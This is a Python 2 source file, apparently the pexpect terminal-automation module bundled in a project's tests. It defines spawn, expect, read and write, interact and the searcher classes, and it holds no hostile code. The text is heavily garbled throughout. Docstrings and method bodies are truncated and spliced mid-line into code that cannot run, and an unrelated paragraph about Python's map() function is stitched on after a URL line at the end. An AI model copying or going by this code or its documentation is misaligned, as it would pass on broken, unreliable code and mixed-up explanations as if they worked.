tblist = [item for item in tblist if self.__filter_not_pexpect(item)]
tblist = traceback.format_list(tblist)
return ''.join(tblist)
def __filter_not_pexpect(self, trace_list_item):
"""This returns True if list item 0 the string 'pexpect.py' in it. """
if trace_list_item[0].find('pexpect.py') == -1:
return True
else:
return False
class EOF(ExceptionPexpect):
"""Raised when EOF is read from a child. This usually means the child has exited."""
class TIMEOUT(ExceptionPexpect):
"""Raised when a read time exceeds the timeout. """
##class TIMEOUT_PATTERN(TIMEOUT):
## """Raised when the pattern match time exceeds the timeout.
## This is different than a read TIMEOUT because the child process may
## give output, thus never give a TIMEOUT, but the output
## may never match a pattern.
## """
##class MAXBUFFER(ExceptionPexpect):
## """Raised when a scan buffer fills before matching an expected pattern."""
def run (command, timeout=-1, withexitstatus=False, events=None, extra_args=None, logfile=None, cwd=None, env=None):
""" pseudo [email protected]:.')
child.expect ('(?i)password')
child.sendline (mypassword)
The previous code can be replace with the following::
from pexpect import *
run ('scp foo myname@host)
Tricky Examples
=============== a dictionary of patterns and responses.
Whenever one of the patterns is seen in the command out run() will send the
associated response string. Note that you should put newlines in your
string if Enter is necessary. The responses may also contain callback
functions. Any callback is function that takes a dictionary. """
if timeout == -1:
child = spawn(command, maxread=2000, logfile=logfile, cwd=cwd, env=env)
else:
child = spawn(command, timeout=timeout, maxread=2000, logfile=logfile, cwd=cwd, env=env)
if events is not None:
patterns = events.keys()
responses = events.values()
else:
patterns=None # We assume that EOF or TIMEOUT will save us.
responses=None
child_result_list = []
event_count = 0
while 1:
try:
index = child.expect (patterns)
if type(child.after) in types.StringTypes:
child_result_list.append(child.before + child.after)
else: # child.after may have been a TIMEOUT or EOF, so don't cat those.
child_result_list.append(child.before)
if type(responses[index]) in types.StringTypes:
child.send(responses[index])
elif type(responses[index]) is types.FunctionType:
callback_result = responses[index](locals())
sys.stdout.flush()
if type(callback_result) in types.StringTypes:
child.send(callback_result)
elif callback_result:
break
else:
raise TypeError ('The callback must be a string or function type.')
event_count = event_count + 1
except TIMEOUT, e:
child_result_list.append(child.before)
break
except EOF, e:
child_result_list.append(child.before)
break
child_result = ''.join(child_result_list)
if withexitstatus:
child.close()
return (child_result, child.exitstatus)
else:
return child_result
class spawn (object):
"""This is the main class interface for Pexpect. Use this class to start
and control child applications. """
def __init__(self, command, args=[], timeout=30, maxread=2000, searchwindowsize=None, logfile=None, cwd=None, env=None):
"".
The searchwindowsize attribute sets the how far back in the incomming
seach buffer Pexpect will search for pattern matches. Every time
Pexpect reads some data from the child it will append the data to the
incomming buffer. The default is to search from the beginning of the
imcomming buffer each time new data is read from the child. But this is
very inefficient if you are running a command that generates a large
amount of data where you want to match The searchwindowsize does not
effect the size of the incomming data buffer. You will still have
access to the full buffer after expect() returns. = file('mylog.txt','w')
child.logfile = fout
Example log to stdout::
child = pexpect.spawn('some_command')
To separately log output sent to the child use logfile_send::
self.logfile_send = fout 0 to return to the old behavior. Most Linux machines
don't like this to be below 0.03. I don't know why..
If you need more detail you can also read the self.status member which
stores the status returned by os.waitpid. You can interpret this using
os.WIFEXITED/os.WEXITSTATUS or os.WIFSIGNALED/os.TERMSIG. """
self.STDIN_FILENO = pty.STDIN_FILENO
self.STDOUT_FILENO = pty.STDOUT_FILENO
self.STDERR_FILENO = pty.STDERR_FILENO
self.stdin = sys.stdin
self.stdout = sys.stdout
self.stderr = sys.stderr
self.searcher = None
self.ignorecase = False
self.before = None
self.after = None
self.match = None
self.match_index = None
self.terminated = True
self.exitstatus = None
self.signalstatus = None
self.status = None # status returned by os.waitpid
self.flag_eof = False
self.pid = None
self.child_fd = -1 # initially closed
self.timeout = timeout
self.delimiter = EOF
self.logfile = logfile
self.logfile_read = None # input from child (read_nonblocking)
self.logfile_send = None # output to send (send, sendline)
self.maxread = maxread # max bytes to read at one time into buffer
self.buffer = '' # This is the read buffer. See maxread.
self.searchwindowsize = searchwindowsize # Anything before searchwindowsize point is preserved, but not searched.
# Most Linux machines don't like delaybeforesend to be below 0.03 (30 ms)..
self.softspace = False # File-like object.
self.' # File-like object.
self.encoding = None # File-like object.
self.closed = True # File-like object.
self.cwd = cwd
self.env = env
self.__irix_hack = (sys.platform.lower().find('irix')>=0) # This flags if we are running on irix
# Solaris uses internal __fork_pty(). All others use pty.fork().
if (sys.platform.lower().find('solaris')>=0) or (sys.platform.lower().find('sunos5')>=0):
self.use_native_pty_fork = False
else:
self.use_native_pty_fork = True
# allow dummy instances for subclasses that may not use command or args.
if command is None:
self.command = None
self.args = None
self.name = '<pexpect factory incomplete>'
else:
self._spawn (command, args)
def __del__(self):
"""This makes sure that no system resources are left open. Python only
garbage collects Python objects. OS file descriptors are not Python
objects, so they must be handled explicitly. If the child file
descriptor was opened outside of this class (passed to the constructor)
then this does not close it. """
if not self.closed:
# It is possible for __del__ methods to execute during the
# teardown of the Python VM itself. Thus self.close() may
# trigger an exception because os.close may be None.
# -- Fernando Perez
try:
self.close()
except AttributeError:
pass
def __str__(self):
"""This returns a human-readable string that represents the state of
the object. """
s = []
s.append(repr(self))
s.append('version: ' + __version__ + ' (' + __revision__ + ')')
s.append('command: ' + str(self.command))
s.append('args: ' + str(self.args))
s.append('searcher: ' + str(self.searcher))
s.append('buffer (last 100 chars): ' + str(self.buffer)[-100:])
s.append('before (last 100 chars): ' + str(self.before)[-100:])
s.append('after: ' + str(self.after))
s.append('match: ' + str(self.match))
s.append('match_index: ' + str(self.match_index))
s.append('exitstatus: ' + str(self.exitstatus)) haved spawned a child
# that performs some task; creates no stdout output; and then dies.
# If command is an int type then it may represent a file descriptor.
if type(command) == type(0):
raise ExceptionPexpect ('Command is an int type. If this is a file descriptor then maybe you want to use fdpexpect.fdspawn which takes an existing file descriptor instead of a command string.')
if type (args) != type([]):
raise TypeError ('The argument, args, must be a list.')
if args == []:
self.args = split_command_line(command)
self.command = self.args[0]
else:
self.args = args[:] # work with a copy
self.args.insert (0, command)
self.command = command
command_with_path = which(self.command)
if command_with_path is None:
raise ExceptionPexpect ('The command was not found or was not executable: %s.' % self.command)
self.command = command_with_path
self.args[0] = self.command
self.'
assert self.pid is None, 'The pid member should be None.'
assert self.command is not None, 'The command member should not be None.'
if self.use_native_pty_fork:
try:
self.pid, self.child_fd = pty.fork()
except OSError, e:
raise ExceptionPexpect('Error! pty.fork() failed: ' + str(e))
else: # Use internal __fork_pty
self.pid, self.child_fd = self.__fork_pty()
if self.pid == 0: # Child
try:
self.child_fd = sys.stdout.fileno() # used by setwinsize()
self.setwinsize(24, 80)
except:
# Some platforms do not like setwinsize (Cygwin).
# This will cause problem when running applications that
# are very picky about window size.
# This is a serious limitation, but not a show stopper.
pass
# Do not allow child to inherit open file descriptors from parent.
max_fd = resource.getrlimit(resource.RLIMIT_NOFILE)[0]
for i in range (3, max_fd):
try:
os.close (i)
except OSError:
pass
# I don't know why this works, but ignoring SIGHUP fixes a
# problem when trying to start a Java daemon with sudo
# (specifically, Tomcat).
signal.signal(signal.SIGHUP, signal.SIG_IGN)
if self.cwd is not None:
os.chdir(self.cwd)
if self.env is None:
os.execv(self.command, self.args)
else:
os.execvpe(self.command, self.args, self.env)
# Parent
self.terminated = False
self.closed = False
def __fork_pty(self):
"""This implements a substitute for the forkpty system call. This
should be more portable than the pty.fork() function. Specifically,
this should work on Solaris.
Modified 10.06.05 by Geoff Marshall: Implemented __fork_pty() method to
resolve the issue with Python's pty.fork() not supporting Solaris,
particularly ssh. Based on patch to posixmodule.c authored by Noah
Spurrier::
"""
parent_fd, child_fd = os.openpty()
if parent_fd < 0 or child_fd < 0:
raise ExceptionPexpect, "Error! Could not open pty with os.openpty()."
pid = os.fork()
if pid < 0:
raise ExceptionPexpect, "Error! Failed os.fork()."
elif pid == 0:
# Child.
os.close(parent_fd)
self.__pty_make_controlling_tty(child_fd)
os.dup2(child_fd, 0)
os.dup2(child_fd, 1)
os.dup2(child_fd, 2)
if child_fd > 2:
os.close(child_fd)
else:
# Parent.
os.close(child_fd)
return pid, parent_fd
def __pty_make_controlling_tty(self, tty_fd):
"""This makes the pseudo-terminal the controlling tty. This should be
more portable than the pty.fork() function. Specifically, this should
work on Solaris. """
child_name = os.ttyname(tty_fd)
# Disconnect from controlling tty if still connected.
fd = os.open("/dev/tty", os.O_RDWR | os.O_NOCTTY);
if fd >= 0:
os.close(fd)
os.setsid()
# Verify we are disconnected from controlling tty
try:
fd = os.open("/dev/tty", os.O_RDWR | os.O_NOCTTY);
if fd >= 0:
os.close(fd)
raise ExceptionPexpect, "Error! We are not disconnected from a controlling tty."
except:
# Good! We are disconnected from a controlling tty.
pass
# Verify we can open child pty.
fd = os.open(child_name, os.O_RDWR);
if fd < 0:
raise ExceptionPexpect, "Error! Could not open child pty, " + child_name
else:
os.close(fd)
# Verify we now have a controlling tty.
fd = os.open("/dev/tty", os.O_WRONLY)
if fd < 0:
raise ExceptionPexpect, "Error! Could not open controlling tty, /dev/tty"
else:
os.close(fd)
def fileno (self): # File-like object.
"""This returns the file descriptor of the pty for the child.
"""
return self.child_fd
def close (self, force=True): # File-like). """
if not self.closed:
self.flush()
os.close (self.child_fd)
time.sleep(self.delayafterclose) # Give kernel time to update process status.
if self.isalive():
if not self.terminate(force):
raise ExceptionPexpect ('close() could not terminate the child using terminate()')
self.child_fd = -1
self.closed = True
#self.pid = None
def flush (self): # File-like object.
"""This does nothing. It is here to support the interface for a
File-like object. """
pass
def isatty (self): # File-like object.
"""This returns True if the file descriptor is open and connected to a
tty(-like) device, else False. """
return os.isatty(self.child_fd) is None then this method to block forever)
def getecho (self):
"""This returns the terminal echo mode. This returns True if echo is
on or False if echo is off. Child applications that are expecting you
to enter a password often set ECHO False. See waitnoecho(). """
attr = termios.tcgetattr(self.child_fd)
if attr[3] & termios.ECHO:
return True
return False')
p.sendline ('1234') # We will see this twice (once from tty echo and again from cat).
p.expect (['1234'])
p.expect (['1234'])') # We will see this twice (once from tty echo and again from cat).'])
"""
self.child_fd
attr = termios.tcgetattr(self.child_fd)
if state:
attr[3] = attr[3] | termios.ECHO
else:
attr[3] = attr[3] & ~termios.ECHO
# I tried TCSADRAIN and TCSAFLUSH, but these were inconsistent
# and blocked on some platforms. TCSADRAIN is probably ideal if it worked.
termios.tcsetattr(self.child_fd, termios.TCSANOW, attr) file was set using
setlog() then all data will also be written to the log file.
If timeout is None then the read may block indefinitely. If timeout is -1
then the self.timeout value is used. If timeout is 0 then the child is
polled and if there was no data immediately ready then this will raise
a TIMEOUT exception.
The timeout refers only to the amount of time to read at least one
character. This is not effected by the 'size' parameter, so if you call
read_nonblocking(size=100, timeout=30) and only one character is
available right away then one character will be returned immediately.
It will not wait for 30 seconds for another 99 characters to come in.
This is a wrapper around os.read(). It uses select.select() to
implement the timeout. """
if self.closed:
raise ValueError ('I/O operation on closed file in read_nonblocking().')
if timeout == -1:
timeout = self.timeout
# Note that some systems such as Solaris do not give an EOF when
# the child dies. In fact, you can still try to read
# from the child_fd -- it will block forever or until TIMEOUT.
# For this case, I test isalive() before doing any reading.
# If isalive() is false, then I pretend that this is the same as EOF.
if not self.isalive():
r,w,e = self.__select([self.child_fd], [], [], 0) # timeout of 0 means "poll"
if not r:
self.flag_eof = True
raise EOF ('End Of File (EOF) in read_nonblocking(). Braindead platform.')
elif self.__irix_hack:
# This is a hack for Irix. It seems that Irix requires a long delay before checking isalive.
# This adds a 2 second delay, but only when the child is terminated.
r, w, e = self.__select([self.child_fd], [], [], 2)
if not r and not self.isalive():
self.flag_eof = True
raise EOF ('End Of File (EOF) in read_nonblocking(). Pokey platform.')
r,w,e = self.__select([self.child_fd], [], [], timeout)
if not r:
if not self.isalive():
# Some platforms, such as Irix, will claim that their processes are alive;
# then timeout on the select; and then finally admit that they are not alive.
self.flag_eof = True
raise EOF ('End of File (EOF) in read_nonblocking(). Very pokey platform.')
else:
raise TIMEOUT ('Timeout exceeded in read_nonblocking().')
if self.child_fd in r:
try:
s = os.read(self.child_fd, size)
except OSError, e: # Linux does this
self.flag_eof = True
raise EOF ('End Of File (EOF) in read_nonblocking(). Exception style platform.')
if s == '': # BSD style
self.flag_eof = True
raise EOF ('End Of File (EOF) in read_nonblocking(). Empty string style platform.')
if self.logfile is not None:
self.logfile.write (s)
self.logfile.flush()
if self.logfile_read is not None:
self.logfile_read.write (s)
self.logfile_read.flush()
return s
raise ExceptionPexpect ('Reached an unexpected state in read_nonblocking().')
def read (self, size = -1): # File-like object.
"". """
if size == 0:
return ''
if size < 0:
self.expect (self.delimiter) # delimiter default is EOF
return self.before
# I could have done this more directly by not using expect(), but
# I deliberately decided to couple read() to expect() so that
# I would catch any bugs early and ensure consistant behavior.
# It's a little less efficient, but there is less for me to
# worry about if I have to later modify read() or expect().
# Note, it's OK if size==-1 in the regex. That just means it
# will never match anything in which case we stop only on EOF.
cre = re.compile('.{%d}' % size, re.DOTALL)
index = self.expect ([cre, self.delimiter]) # delimiter default is EOF
if index == 0:
return self.after ### self.before should be ''. Should I assert this?
return self.before
def readline (self, size = -1): # File-like object.
"""This reads and returns one entire line. A trailing newline is kept
in the string, but may be absent when a file ends with an incomplete
line. Note: This readline() looks for a \\r\\n pair even on UNIX
because this is what the pseudo tty device returns. So contrary to what
you may expect you will receive the newline as \\r\\n. An empty string
is returned when EOF is hit immediately. Currently, the size argument is
mostly ignored, so this behavior is not standard for a file-like
object. If size is 0 then an empty string is returned. """
if size == 0:
return ''
index = self.expect (['\r\n', self.delimiter]) # delimiter default is EOF
if index == 0:
return self.before + '\r\n'
else:
return self.before
def __iter__ (self): # File-like object.
"""This is to support iterators over a file-like object.
"""
return self
def next (self): # File-like object.
"""This is to support iterators over a file-like object.
"""
result = self.readline()
if result == "":
raise StopIteration
return result
def readlines (self, sizehint = -1): # File-like object.
"""This reads until EOF using readline() and returns a list containing
the lines thus read. The optional "sizehint" argument is ignored. """
lines = []
while True:
line = self.readline()
if not line:
break
lines.append(line)
return lines
def write(self, s): # File-like object.
"""This is similar to send() except that there is no return value.
"""
self.send (s)
def writelines (self, sequence): # File-like object.
"""This calls write() for each element in the sequence. The sequence
can be any iterable object producing strings, typically a list of
strings. This does not add line separators There is no return value.
"""
for s in sequence:
self.write (s)
def send(self, s):
"""This sends a string to the child process. This returns the number of
bytes written. If a log file was set then the data is also written to
the log. """
time.sleep(self.delaybeforesend)
if self.logfile is not None:
self.logfile.write (s)
self.logfile.flush()
if self.logfile_send is not None:
self.logfile_send.write (s)
self.logfile_send.flush()
c = os.write(self.child_fd, s)
return c
def sendline(self, s=''):
"""This is like send(), but it adds a line feed (os.linesep). This
returns the number of bytes written. """
n = self.send(s)
n = n + self.send (os.linesep)
return n
def sendcontrol(self, char):
"""This sends a control character to the child such as Ctrl-C or
Ctrl-D. For example, to send a Ctrl-G (ASCII 7)::
child.sendcontrol('g')
See also, sendintr() and sendeof().
"""
char = char.lower()
a = ord(char)
if a>=97 and a<=122:
a = a - ord('a') + 1
return self.send (chr(a))
d = {'@':0, '`':0,
'[':27, '{':27,
'\\':28, '|':28,
']':29, '}': 29,
'^':30, '~':30,
'_':31,
'?':127}
if char not in d:
return 0
return self.send (chr(d[char])). """
### Hmmm... how do I send an EOF?
###C if ((m = write(pty, *buf, p - *buf)) < 0)
###C return (errno == EWOULDBLOCK) ? n : -1;
#fd = sys.stdin.fileno()
#old = termios.tcgetattr(fd) # remember current state
#attr = termios.tcgetattr(fd)
#attr[3] = attr[3] | termios.ICANON # ICANON must be set to recognize EOF
#try: # use try/finally to ensure state gets restored
# termios.tcsetattr(fd, termios.TCSADRAIN, attr)
# if hasattr(termios, 'CEOF'):
# os.write (self.child_fd, '%c' % termios.CEOF)
# else:
# # Silly platform does not define CEOF so assume CTRL-D
# os.write (self.child_fd, '%c' % 4)
#finally: # restore state
# termios.tcsetattr(fd, termios.TCSADRAIN, old)
if hasattr(termios, 'VEOF'):
char = termios.tcgetattr(self.child_fd)[6][termios.VEOF]
else:
# platform does not define VEOF so assume CTRL-D
char = chr(4)
self.send(char)
def sendintr(self):
"""This sends a SIGINT to the child. It does not require
the SIGINT to be the first character on a line. """
if hasattr(termios, 'VINTR'):
char = termios.tcgetattr(self.child_fd)[6][termios.VINTR]
else:
# platform does not define VINTR so assume CTRL-C
char = chr(3)
self.send (char)
def eof (self):
"""This returns True if the EOF exception was ever raised.
"""
return self.flag_eof, e:
#, technically, the child
is still alive until its output is read. """
if self.isalive():
pid, status = os.waitpid(self.pid, 0)
else:
raise ExceptionPexpect ('Cannot wait for dead child process.')
self.exitstatus = os.WEXITSTATUS(status) ('Wait was called for a child process that is stopped. This is not supported. Is some other process attempting job control with our child pid?')
return self.exitstatus. """
if self.terminated:
return False
if self.flag_eof:
# This is for Linux, which requires the blocking form of waitpid to get
# status of a defunct process. This is super-lame. The flag_eof would have
# been set in read_nonblocking(), so this should be safe.
waitpid_options = 0
else:
waitpid_options = os.WNOHANG
try:
pid, status = os.waitpid(self.pid, waitpid_options)
except OSError, e: # No child processes
if e[0] == errno.ECHILD:
raise ExceptionPexpect ('isalive() encountered condition where "terminated" is 0, but there was no child process. Did someone else call waitpid() on our process?')
else:
raise e
# I have to do this twice for Solaris. I can't even believe that I figured this out...
# If waitpid() returns 0 it means that no child process wishes to
# report, and the value of status is undefined.
if pid == 0:
try:
pid, status = os.waitpid(self.pid, waitpid_options) ### os.WNOHANG) # Solaris!
except OSError, e: # This should never happen...
if e[0] == errno.ECHILD:
raise ExceptionPexpect ('isalive() encountered condition that should never happen. There was no child process. Did someone else call waitpid() on our process?')
else:
raise e
# If pid is still 0 after two calls to waitpid() then
# the process really is alive. This seems to work on all platforms, except
# for Irix which seems to require a blocking call on waitpid or select, so I let read_nonblocking
# take care of this situation (unfortunately, this requires waiting through the timeout).
if pid == 0:
return True
if pid == 0:
return True ('isalive() encountered condition where child process is stopped. This is not supported. Is some other process attempting job control with our child pid?')
return False)
def compile_pattern_list(self, patterns):
""(clp, timeout)
...
"""
if patterns is None:
return []
if type(patterns) is not types.ListType:
patterns = [patterns]
compile_flags = re.DOTALL # Allow dot to match \n
if self.ignorecase:
compile_flags = compile_flags | re.IGNORECASE
compiled_pattern_list = []
for p in patterns:
if type(p) in types.StringTypes:
compiled_pattern_list.append(re.compile(p, compile_flags))
elif p is EOF:
compiled_pattern_list.append(EOF)
elif p is TIMEOUT:
compiled_pattern_list.append(TIMEOUT)
elif type(p) is type(re.compile('')):
compiled_pattern_list.append(p)
else:
raise TypeError ('Argument must be one of StringTypes, EOF, TIMEOUT, SRE_Pattern, or a list of those type. %s' % str(type(p)))
return compiled_pattern_list
def expect(self, pattern, timeout = -1, searchwindowsize=None):
"" returs 1 ('foo') if parts of the final 'bar' arrive late
After a match is found the instance attributes 'before', 'after' and
'match' will be set. You can see all the data read before the match in
'before'. You can see the data that was matched in 'after'. The
re.MatchObject used in the re match will be in 'match'. If an error
occurred then 'before' will be set to all the data read so far and
'after' and 'match' will be None.
If timeout is -1 then timeout will be set to the self.timeout value.
A list entry may be EOF or TIMEOUT instead of a string. This will
catch these exceptions and return the index of the list entry instead
of raising the exception. The attribute 'after' will be set to the
exception type. The attribute 'match'().
"""
compiled_pattern_list = self.compile_pattern_list(pattern)
return self.expect_list(compiled_pattern_list, timeout, searchwindowsize)
def expect_list(self, pattern_list, timeout = -1, searchwindowsize = -1):
""(). If timeout==-1 then
the self.timeout value is used. If searchwindowsize==-1 then the
self.searchwindowsize value is used. """
return self.expect_loop(searcher_re(pattern_list), timeout, searchwindowsize)
def expect_exact(self, pattern_list, timeout = -1, searchwindowsize = -1):
"""This is similar to expect(), but uses plain string matching instead
of compiled regular expressions in 'pattern_list'. The 'pattern."""
if type(pattern_list) in types.StringTypes or pattern_list in (TIMEOUT, EOF):
pattern_list = [pattern_list]
return self.expect_loop(searcher_string(pattern_list), timeout, searchwindowsize)
def expect_loop(self, searcher, timeout = -1, searchwindowsize = -1):
"""This is the common loop used inside expect. The 'searcher' should be
an instance of searcher_re or searcher_string, which describes how and what
to search for in the input.
See expect() for other arguments, return value and exceptions. """
self.searcher = searcher
if timeout == -1:
timeout = self.timeout
if timeout is not None:
end_time = time.time() + timeout
if searchwindowsize == -1:
searchwindowsize = self.searchwindowsize
try:
incoming = self.buffer
freshlen = len(incoming)
while True: # Keep reading until exception or return.
index = searcher.search(incoming, freshlen, searchwindowsize)
if index >= 0:
self.buffer = incoming[searcher.end : ]
self.before = incoming[ : searcher.start]
self.after = incoming[searcher.start : searcher.end]
self.match = searcher.match
self.match_index = index
return self.match_index
# No match at this point
if timeout < 0 and timeout is not None:
raise TIMEOUT ('Timeout exceeded in expect_any().')
# Still have time left, so read more data
c = self.read_nonblocking (self.maxread, timeout)
freshlen = len(c)
time.sleep (0.0001)
incoming = incoming + c
if timeout is not None:
timeout = end_time - time.time()
except EOF, e:
self.buffer = ''
self.before = incoming
self.after = EOF
index = searcher.eof_index
if index >= 0:
self.match = EOF
self.match_index = index
return self.match_index
else:
self.match = None
self.match_index = None
raise EOF (str(e) + '\n' + str(self))
except TIMEOUT, e:
self.buffer = incoming
self.before = incoming
self.after = TIMEOUT
index = searcher.timeout_index
if index >= 0:
self.match = TIMEOUT
self.match_index = index
return self.match_index
else:
self.match = None
self.match_index = None
raise TIMEOUT (str(e) + '\n' + str(self))
except:
self.before = incoming
self.after = None
self.match = None
self.match_index = None
raise
def getwinsize(self):
"""This returns the terminal window size of the child tty. The return
value is a tuple of (rows, cols). """
TIOCGWINSZ = getattr(termios, 'TIOCGWINSZ', 1074295912L)
s = struct.pack('HHHH', 0, 0, 0, 0)
x = fcntl.ioctl(self.fileno(), TIOCGWINSZ, s)
return struct.unpack('HHHH', x)[0:2]
def setwinsize(self, r, c):
"". """
# Check for buggy platforms. Some Python versions on some platforms
# (notably OSF1 Alpha and RedHat 7.1) truncate the value for
# termios.TIOCSWINSZ. It is not clear why this happens.
# These platforms don't seem to handle the signed int very well;
# yet other platforms like OpenBSD have a large negative value for
# TIOCSWINSZ and they don't have a truncate problem.
# Newer versions of Linux have totally different values for TIOCSWINSZ.
# Note that this fix is a hack.
TIOCSWINSZ = getattr(termios, 'TIOCSWINSZ', -2146929561)
if TIOCSWINSZ == 2148037735L: # L is not required in Python >= 2.2.
TIOCSWINSZ = -2146929561 # Same bits, but with sign.
# Note, assume ws_xpixel and ws_ypixel are zero.
s = struct.pack('HHHH', r, c, 0, 0)
fcntl.ioctl(self.fileno(), TIOCSWINSZ, s) stop. The default for
escape_character is ^]. This should not be confused with ASCII 27 --
the ESC character. ASCII 29 was chosen for historical merit because
this is the character used by 'telnet' as the escape character. The
escape_character will not be sent to the child process.
You may pass in optional input and output filter functions. These
functions should take a string and return a string.))
global p
p.setwinsize(a[0],a[1])
p = pexpect.spawn('/bin/bash') # Note this is global and used in sigwinch_passthrough.
signal.signal(signal.SIGWINCH, sigwinch_passthrough)
p.interact()
"""
# Flush the buffer.
self.stdout.write (self.buffer)
self.stdout.flush()
self.buffer = ''
mode = tty.tcgetattr(self.STDIN_FILENO)
tty.setraw(self.STDIN_FILENO)
try:
self.__interact_copy(escape_character, input_filter, output_filter)
finally:
tty.tcsetattr(self.STDIN_FILENO, tty.TCSAFLUSH, mode)
def __interact_writen(self, fd, data):
"""This is used by the interact() method.
"""
while data != ''():
r,w,e = self.__select([self.child_fd, self.STDIN_FILENO], [], [])
if self.child_fd in r:
data = self.__interact_read(self.child_fd)
if output_filter: data = output_filter(data)
if self.logfile is not None:
self.logfile.write (data)
self.logfile.flush()
os.write(self.STDOUT_FILENO, data)
if self.STDIN_FILENO in r:
data = self.__interact_read(self.STDIN_FILENO)
if input_filter: data = input_filter(data)
i = data.rfind(escape_character)
if i != -1:
data = data[:i]
self.__interact_writen(self.child_fd, data)
break
self.__interact_writen(self.child_fd, data)
def __select (self, iwtd, owtd, ewtd, timeout=None):
"""This is a wrapper around select.select() that ignores signals. If
select.select raises a select.error exception and errno is an EINTR
error then it is ignored. Mainly this is used to ignore sigwinch
(terminal resize). """
# if select() is interrupted by a signal (errno==EINTR) then
# we loop back and enter the select() again.
if timeout is not None:
end_time = time.time() + timeout
while True:
try:
return select.select (iwtd, owtd, ewtd, timeout)
except select.error, e:
if e[0] == errno.EINTR:
# if we loop back we have to subtract the amount of time we already waited.
if timeout is not None:
timeout = end_time - time.time()
if timeout < 0:
return ([],[],[])
else: # something else caused the select.error, so this really is an exception
raise
##############################################################################
# The following methods are no longer supported or allowed.
def setmaxread (self, maxread):
"""This method is no longer supported or allowed. I don't like getters
and setters without a good reason. """
raise ExceptionPexpect ('This method is no longer supported or allowed. Just assign a value to the maxread member variable.')
def setlog (self, fileobject):
"""This method is no longer supported or allowed.
"""
raise ExceptionPexpect ('This method is no longer supported or allowed. Just assign a value to the logfile member variable.')
##############################################################################
# End of spawn class
##############################################################################
class searcher_string (object):
"""This is a plain matching string itself
"""
def __init__(self, strings):
"""This creates an instance of searcher_string. This argument 'strings'
may be a list; a sequence of strings; or the EOF or TIMEOUT types. """
self.eof_index = -1
self.timeout_index = -1
self._strings = []
for n, s in zip(range(len(strings)), strings):
if s is EOF:
self.eof_index = n
continue
if s is TIMEOUT:
self.timeout_index = n
continue
self._strings.append((n, s))
def __str__(self):
"""This returns a human-readable string that represents the state of
the object."""
ss = [ (ns[0],' %d: "%s"' % ns) for ns in self._strings ]
ss.append((-1,'searcher_string:')) search
strings. 'freshlen' must indicate the number of bytes at the end of
'buffer' which have not been searched before. It helps to avoid
searching the same, possibly big, buffer over and over again.
See class spawn for the 'searchwindowsize' argument.
If there is a match this returns the index of that string, and sets
'start', 'end' and 'match'. Otherwise, this returns -1. """
absurd_match = len(buffer)
first_match = absurd_match
# 'freshlen' helps a lot here. Further optimizations could
# possibly include:
#
# using something like the Boyer-Moore Fast String Searching
# Algorithm; pre-compiling the search through a list of
# strings into something that can scan the input once to
# search for all N strings; realize that if we search for
# ['bar', 'baz'] and the input is '...foo' we need not bother
# rescanning until we've read three more bytes.
#
# Sadly, I don't know enough about this interesting topic. /grahn
for index, s in self._strings:
if searchwindowsize is None:
# the match, if any, can only be in the fresh data,
# or at the very end of the old data
offset = -(freshlen+len(s))
else:
# better obey searchwindowsize
offset = -searchwindowsize
n = buffer.find(s, offset)
if n >= 0 and n < first_match:
first_match = n
best_index, best_match = index, s
if first_match == absurd_match:
return -1
self.match = best_match
self.start = first_match
self.end = self.start + len(self.match)
return best_index
class searcher_re (object):
"""This is regular expression re.match object returned by a succesful re.search
"""
def __init__(self, patterns):
"""This creates an instance that searches for 'patterns' Where
'patterns' may be a list or other sequence of compiled regular
expressions, or the EOF or TIMEOUT types."""
self.eof_index = -1
self.timeout_index = -1
self._searches = []
for n, s in zip(range(len(patterns)), patterns):
if s is EOF:
self.eof_index = n
continue
if s is TIMEOUT:
self.timeout_index = n
continue
self._searches.append((n, s))
def __str__(self):
"""This returns a human-readable string that represents the state of
the object."""
ss = [ (n,' %d: re.compile("%s")' % (n,str(s.pattern))) for n,s in self._searches]
ss.append((-1,'searcher_re:')) regular
expressions. 'freshlen' must indicate the number of bytes at the end of
'buffer' which have not been searched before.
See class spawn for the 'searchwindowsize' argument.
If there is a match this returns the index of that string, and sets
'start', 'end' and 'match'. Otherwise, returns -1."""
absurd_match = len(buffer)
first_match = absurd_match
# 'freshlen' doesn't help here -- we cannot predict the
# length of a match, and the re module provides no help.
if searchwindowsize is None:
searchstart = 0
else:
searchstart = max(0, len(buffer)-searchwindowsize)
for index, s in self._searches:
match = s.search(buffer, searchstart)
if match is None:
continue
n = match.start()
if n < first_match:
first_match = n
the_match = match
best_index = index
if first_match == absurd_match:
return -1
self.start = first_match
self.match = the_match
self.end = self.match.end()
return best_index
def which (filename):
"""This takes a given filename; tries to find it in the environment path;
then checks if it is executable. This returns the full path to the filename
if found and executable. Otherwise this returns None."""
# Special case where filename already contains a path.
if os.path.dirname(filename) != '':
if os.access (filename, os.X_OK):
return filename
if not os.environ.has_key('PATH') or os.environ['PATH'] == '':
p = os.defpath
else:
p = os.environ['PATH']
# Oddly enough this was the one line that made Pexpect
# incompatible with Python 1.5.2.
#pathlist = p.split (os.pathsep)
pathlist = string.split (p, os.pathsep)
for path in pathlist:
f = os.path.join(path, filename)
if os.access(f, os.X_OK):
return f
return None
def split_command_line(command_line):
"""This splits a command line into a list of arguments. It splits arguments
on spaces, but handles embedded quotes, doublequotes, and escaped
characters. It's impossible to do this with a regular expression, so I
wrote a little state machine to parse the command line. """
arg_list = []
arg = ''
# Constants to name the states we can be in.
state_basic = 0
state_esc = 1
state_singlequote = 2
state_doublequote = 3
state_whitespace = 4 # The state of consuming whitespace between commands.
state = state_basic
for c in command_line:
if state == state_basic or state == state_whitespace:
if c == '\\': # Escape the next character
state = state_esc
elif c == r"'": # Handle single quote
state = state_singlequote
elif c == r'"': # Handle double quote
state = state_doublequote
elif c.isspace():
# Add arg to arg_list if we aren't in the middle of whitespace.
if state == state_whitespace:
None # Do nothing.
else:
arg_list.append(arg)
arg = ''
state = state_whitespace
else:
arg = arg + c
state = state_basic
elif state == state_esc:
arg = arg + c
state = state_basic
elif state == state_singlequote:
if c == r"'":
state = state_basic
else:
arg = arg + c
elif state == state_doublequote:
if c == r'"':
state = state_basic
else:
arg = arg + c
if arg != '':
arg_list.append(arg)
return arg_list
# vi:ts=4:sw=4:expandtab:ft=python: | https://apache.googlesource.com/duo_unix/+/ed38a958bb39f42b77fb794ca7fb9a66420e46c0/tests/pexpect.py | CC-MAIN-2022-21 | en | refinedweb |
After applying the supplied function to each item of a given iterable, the map() function returns a map object which is an iterator of the results (list, tuple, etc.)
Historical development of the maps function
Computations in functional programming are performed by mixing functions that receive parameters and return a substantial value (or values). These functions do not change the program’s state or modify its input parameters. They convey the outcome of a calculation. Pure functions are the name given to these types of functions.
